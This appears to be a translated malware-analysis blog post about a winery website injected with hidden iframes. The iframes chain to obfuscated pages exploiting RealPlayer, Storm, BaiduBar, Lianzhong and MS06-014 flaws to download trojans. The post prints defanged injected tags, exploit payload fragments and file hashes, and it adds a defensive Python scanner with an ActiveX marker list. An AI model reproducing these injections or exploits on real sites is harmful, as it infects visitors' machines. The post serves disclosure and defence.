The website of a Bama "god wine" company is infected with Worm.Win32.Downloader / Trojan.Win32.Mnless



Endurer original, version 1

Checking the homepage source shows the following code injected several times:
/---
<iframe src=hxxp://a**a.ll*sging**.com/ww/new05.htm?075 width=1 name='000000' height=1></iframe>

<iframe src=hxxp://a**a.ll*sging**.com/ww/new05.htm?013 width=1 height=1></iframe>
<iframe src=hxxp://www.f**oafa**u.info/ms30.htm?823 width=1 name='000000' height=1></iframe>
<iframe src=hxxp://a**.ll*sging**.com/ww/new05.htm?075 width=1 name='000000' height=1></iframe>
---/

hxxp://a**a.ll*sging**.com/ww/new05.htm?075 contains:
/---
<iframe src=hxxp://a**a.ll*sging**.com/AA/haha.htm width=5 height=5></iframe>
<iframe src=hxxp://a**a.ll*sging**.com/AA/gege.htm width=5 height=5></iframe>
---/

hxxp://a**a.ll*sging**.com/ww/new05.htm?013 and hxxp://a**a.ll*sging**.com/ww/new05.htm? have the same content as the ?075 page.

hxxp://a**a.ll*sging**.com/AA/haha.htm is obfuscated; decoding it twice yields the original code, which checks the cookie variable OK and then writes out:
/---
<script src=hxxp://aa.ll*sging**.com/AA/11.js></script>
<script src=hxxp://aa.ll*sging**.com/AA/BB.js></script>
<iframe width='10' height='10' src='hxxp://a**.ll*sging**.com/AA/bf.html'></iframe>
---/
It exploits the Storm video player vulnerability and the BaiduBar.Tool ActiveX control to download hxxp://down.ll*sging**.com/BB/Bd.Cab.

File Description: D:/test/Bd.Cab
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 23:45:22
Modification time: 23:45:30
Access time:
Size: 34045 bytes, 33.253 KB
MD5: 67e8a38e7570de02ec1e3b0fec7ac9d9
SHA1: 9ef39949c850cfe8c03f76fa0dfc7ec3bd286254
CRC32: 888380b0

File Description: D:/test/bd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time:
Size: 34837 bytes, 34.21 KB
MD5: 865188f4f8583f4c0728553b04375261
SHA1: bf3b97ae81f49caf96268ef4cff5b96c18eb88
CRC32: deed8b5c

Kaspersky reports Worm.Win32.Downloader.bi
Rising reports Trojan.Win32.Mnless.znc (packer: NSPack)

hxxp://a**.ll*sging**.com/AA/11.js, decoded once, yields code that downloads hxxp://down.ll*sging**.com/BB/014.exe, saves it as ntuser.com, and runs it.

File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 23:42:45
Modification time: 23:42:46
Access time:
Size: 34854 bytes, 34.38 KB
MD5: 19a5e9859be41540446fd3d7b6533d23
SHA1: 5b3a4028a4e85422acaa3f7f974ecbb5d35e936b
CRC32: 57901cec

Kaspersky reports Worm.Win32.Downloader.bd
Rising reports Backdoor.Win32.Agent.yos (packer: NSPack)

hxxp://a**a.ll*sging**.com/AA/BB.js is the exploit code for the Storm audio/video player vulnerability.

hxxp://a**a.ll*sging**.com/AA/PPP.js is the exploit code for the PPStream vulnerability.

hxxp://a**a.ll*sging**.com/AA/bf.html is the exploit code for the stack overflow vulnerability in the Lianzhong ConnectAndEnterRoom ActiveX control.

Reference:
Lianzhong ConnectAndEnterRoom ActiveX Control Stack Overflow Vulnerability
http://www.nsfocus.net/vulndb/11122

hxxp://a**a.ll*sging**.com/AA/gege.htm, decoded twice, yields the original code, an exploit for the RealPlayer vulnerability. This part of it is interesting:
/---
payload += "yuange"; real.Import("C:\Program Files\netmeeting\testsnd.wav", payload, "",)}; realexploit();)
---/

hxxp://www.f**oafa**u.info/ms30.htm?823 contains:
/---
<html>
<iframe src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="88/883.htm" width="1" height="1" frameborder="0"></iframe>
</html>
---/
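As an added defender-side example (not part of Endurer's post), the following scanner flags the injection pattern shown above on the homepage and in ms30.htm: iframes shrunk to 1x1 or zero height, iframe and script sources on a foreign host, and inline script naming the abused controls. The site host and the sample page are constructed; RDS.DataSpace is the MS06-014 control, while the other progID spellings are assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators from the write-up: 1x1 / zero-height iframes, iframe or script sources on a
# foreign host, and script text naming the abused controls (RDS.DataSpace is MS06-014's;
# the other progID spellings are assumed here for illustration, not taken from the page).
ACTIVEX_MARKERS = ("rds.dataspace", "baidubar.tool", "connectandenterroom", "ierpctl")


class InjectScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (kind, detail) tuples in document order

    @staticmethod
    def _dim(value):
        m = re.search(r"\d+", value or "")
        return int(m.group()) if m else 300  # no size given: browser default, visible

    def _offsite(self, url):
        host = urlparse(url).netloc.lower()
        return bool(host) and host != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            hidden = min(self._dim(a.get("width")), self._dim(a.get("height"))) <= 1
            if hidden or self._offsite(a.get("src", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script" and self._offsite(a.get("src", "")):
            self.findings.append(("offsite-script", a["src"]))

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies here, so inline ActiveX loaders land in data.
        low = data.lower()
        for marker in ACTIVEX_MARKERS:
            if marker in low:
                self.findings.append(("activex", marker))


def scan_page(html, site_host):
    parser = InjectScanner(site_host)
    parser.feed(html)
    return parser.findings


# Constructed sample modelled on the injected lines in the write-up (hosts left masked).
SAMPLE = """<html><body><iframe src=hxxp://a**a.ll*sging**.com/ww/new05.htm?075 width=1 name='000000' height=1></iframe>
<iframe src="88/881.htm" width="20" height="0" frameborder="0"></iframe>
<script src=hxxp://aa.ll*sging**.com/AA/11.js></script><script>var o = new ActiveXObject("RDS.DataSpace");</script>
<iframe src="/news/index.htm" width="600" height="400"></iframe></body></html>"""
```

Running scan_page(SAMPLE, "www.example-winery.invalid") reports the two hidden iframes, the off-site script and the RDS.DataSpace reference, and leaves the normal-sized same-site iframe alone.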

hxxp://www.f**oafa**u.info/88/881.htm uses MS06-014 (msadco) to download hxxp://www.*6*8y**u*.cn/68down.exe, save it as C:\Microsoft.pif, and start it by creating the file C:\Microsoft.vbs. A variable in the code is named qq784378237.

File Description: D:/test/68down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time:
Size: 31876 bytes, 31.132 KB
MD5: 7f29c1dbaae355933130030aed699672
SHA1: 1a5ede06b6ccd19bb7fb9af3e9b0456e847bfdd0
CRC32: 2738d5ad

Kaspersky reports Worm.Win32.Downloader.cg
Rising reports Trojan.Win32.Mnless.zyt

hxxp://www.f**oafa**u.info/88/883.htm, decoded twice, yields the original code, again an exploit for the RealPlayer vulnerability. Its final part differs from the one above:
/---
payload += "chuizi";
real.Import("C:\\Program Files\\netmeeting\\testsnd.wav", payload, "", 0, 0);
}
realexploit();)
---/
